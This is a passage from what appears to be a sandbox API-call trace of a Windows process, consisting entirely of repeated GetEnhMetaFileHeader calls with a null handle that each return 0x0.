lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.893] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.894] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.895] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0085.896] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 